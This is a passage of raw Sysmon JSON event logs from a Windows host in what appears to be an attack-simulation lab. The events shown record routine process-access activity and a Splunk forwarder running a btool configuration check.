C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3499,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3500,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3501,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3502,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3503,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-00105D7F0500}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-00105D7F0500}","TargetProcessId":"4880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3504,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.345\r\nSourceProcessGUID: {41C8662E-1FF6-5F25-0000-00105D7F0500}\r\nSourceProcessId: 4880\r\nSourceThreadId: 4848\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.345","SourceProcessGUID":"{41C8662E-1FF6-5F25-0000-00105D7F0500}","SourceProcessId":"4880","SourceThreadId":"4848","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3505,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-00105D7F0500}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-00105D7F0500}","TargetProcessId":"4880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3506,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.422\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-0010BC820500}\r\nProcessId: 748\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nParentProcessId: 2364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.422","ProcessGuid":"{41C8662E-1FF6-5F25-0000-0010BC820500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","ParentProcessId":"2364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 